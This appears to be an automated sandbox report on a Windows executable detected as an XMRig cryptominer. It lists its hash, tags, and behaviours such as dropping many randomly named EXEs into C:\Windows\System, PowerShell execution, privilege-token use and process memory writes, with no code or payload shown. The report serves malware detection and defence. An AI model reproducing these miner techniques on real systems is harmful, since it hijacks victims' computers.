Malware Analysis Report

2024-11-16 12:03

Sample ID 240612-mhf41svdkp
Target 3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe
SHA256 5a9f6f184c4ffc0a0163ab2d13fcce75710b216f733dd27e7bca8f18a61e6820
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5a9f6f184c4ffc0a0163ab2d13fcce75710b216f733dd27e7bca8f18a61e6820

Threat Level: Known bad

The file 3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

XMRig Miner payload

Xmrig family

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 10:27

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 10:27

Reported

2024-06-12 10:30

Platform

win7-20240611-en

Max time kernel

145s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\irnYcmS.exe N/A
N/A N/A C:\Windows\System\JzdoPEB.exe N/A
N/A N/A C:\Windows\System\VlXazjk.exe N/A
N/A N/A C:\Windows\System\eqEWWtA.exe N/A
N/A N/A C:\Windows\System\wHcmFkc.exe N/A
N/A N/A C:\Windows\System\ndXGGpK.exe N/A
N/A N/A C:\Windows\System\KsKApsH.exe N/A
N/A N/A C:\Windows\System\wTNkYxh.exe N/A
N/A N/A C:\Windows\System\imNdmOx.exe N/A
N/A N/A C:\Windows\System\jsLedUI.exe N/A
N/A N/A C:\Windows\System\DyiqsAf.exe N/A
N/A N/A C:\Windows\System\ENwIaBS.exe N/A
N/A N/A C:\Windows\System\NNoEWkv.exe N/A
N/A N/A C:\Windows\System\hQiMafa.exe N/A
N/A N/A C:\Windows\System\PKvqyuA.exe N/A
N/A N/A C:\Windows\System\kcJdNxc.exe N/A
N/A N/A C:\Windows\System\gyCwhPi.exe N/A
N/A N/A C:\Windows\System\KPKlOrK.exe N/A
N/A N/A C:\Windows\System\hPOwnzY.exe N/A
N/A N/A C:\Windows\System\ysiLQfc.exe N/A
N/A N/A C:\Windows\System\GBXJJMd.exe N/A
N/A N/A C:\Windows\System\YiKNMsk.exe N/A
N/A N/A C:\Windows\System\imXwvzV.exe N/A
N/A N/A C:\Windows\System\mHbVdcn.exe N/A
N/A N/A C:\Windows\System\BEExAhH.exe N/A
N/A N/A C:\Windows\System\pnxCrZd.exe N/A
N/A N/A C:\Windows\System\dnxtNlp.exe N/A
N/A N/A C:\Windows\System\OAhIsyR.exe N/A
N/A N/A C:\Windows\System\lkYiSyZ.exe N/A
N/A N/A C:\Windows\System\KQxgSSw.exe N/A
N/A N/A C:\Windows\System\slssFJi.exe N/A
N/A N/A C:\Windows\System\NOZrvRT.exe N/A
N/A N/A C:\Windows\System\IZBoJFY.exe N/A
N/A N/A C:\Windows\System\xRfHUFL.exe N/A
N/A N/A C:\Windows\System\BKQrKyf.exe N/A
N/A N/A C:\Windows\System\VOZdBZY.exe N/A
N/A N/A C:\Windows\System\jqYJXsZ.exe N/A
N/A N/A C:\Windows\System\WAQgkov.exe N/A
N/A N/A C:\Windows\System\sERrPxB.exe N/A
N/A N/A C:\Windows\System\jqeXgBE.exe N/A
N/A N/A C:\Windows\System\riKjyno.exe N/A
N/A N/A C:\Windows\System\zDtlIKv.exe N/A
N/A N/A C:\Windows\System\DKyoSSo.exe N/A
N/A N/A C:\Windows\System\dXVzYQP.exe N/A
N/A N/A C:\Windows\System\ESQrnON.exe N/A
N/A N/A C:\Windows\System\eBjOiwu.exe N/A
N/A N/A C:\Windows\System\uWtsiRF.exe N/A
N/A N/A C:\Windows\System\UqljBXK.exe N/A
N/A N/A C:\Windows\System\endeXWz.exe N/A
N/A N/A C:\Windows\System\CuiWWSD.exe N/A
N/A N/A C:\Windows\System\xNOMJsa.exe N/A
N/A N/A C:\Windows\System\FEKPkeS.exe N/A
N/A N/A C:\Windows\System\XNOifRr.exe N/A
N/A N/A C:\Windows\System\VVHQKUI.exe N/A
N/A N/A C:\Windows\System\rfNKTHf.exe N/A
N/A N/A C:\Windows\System\UOaCvil.exe N/A
N/A N/A C:\Windows\System\mePdYzG.exe N/A
N/A N/A C:\Windows\System\VwtmMmy.exe N/A
N/A N/A C:\Windows\System\GtJViOB.exe N/A
N/A N/A C:\Windows\System\shqVVYj.exe N/A
N/A N/A C:\Windows\System\QAudvAQ.exe N/A
N/A N/A C:\Windows\System\uLXFCMV.exe N/A
N/A N/A C:\Windows\System\DEcDLce.exe N/A
N/A N/A C:\Windows\System\coAJDYd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\YpAUSdK.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\XttDnOb.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\RMkNUgh.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\WloMydJ.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\poMjWez.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\IrtsumZ.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\YiYgIdi.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\FDFfBxK.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\NYMEjIa.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\zETWdRq.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\DSNiSSs.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\TTFmooh.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\IhzHgHU.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\zXULhoN.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\IRmpVQh.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\GjDSiXN.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\XgXIOqV.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\HxrCXcb.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ysiLQfc.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ILErGrp.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\gnZCXYR.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ENbsEFH.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\dJGHiFh.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\WyrRxpy.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\gvCGEGB.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\gPpYBgG.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZIxOLIT.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\RqacAoG.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\pHKYCZR.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\RMlRZxw.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\IrNTKZk.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\lzrZcWW.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\BwpZNTa.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\pyoxpDX.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\UpuXFCA.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\QAudvAQ.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\vsyqKJu.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\yJONiwp.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\MKicXTL.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\XeiRTfb.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\WuYkRSk.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\KNadHQe.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\DqwyvMl.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\UDhEKsH.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\RBWNtYr.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZoEvQnc.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\bKIYbTN.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\mwGnLhU.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\HFmrgiE.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\EZKzXik.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\bQASwug.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\AisGBdt.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\CBLNdMK.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\MEBMtcT.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\YpRUsdA.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\xsREXWr.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\gmuIWqp.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\lczHzbp.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\SaaQwJH.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\BNHQBsJ.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\mAPwcgN.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\IRemQQm.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\vveDAGV.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\tgOEGxs.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2764 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2764 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2764 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2764 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\irnYcmS.exe
PID 2764 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\irnYcmS.exe
PID 2764 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\irnYcmS.exe
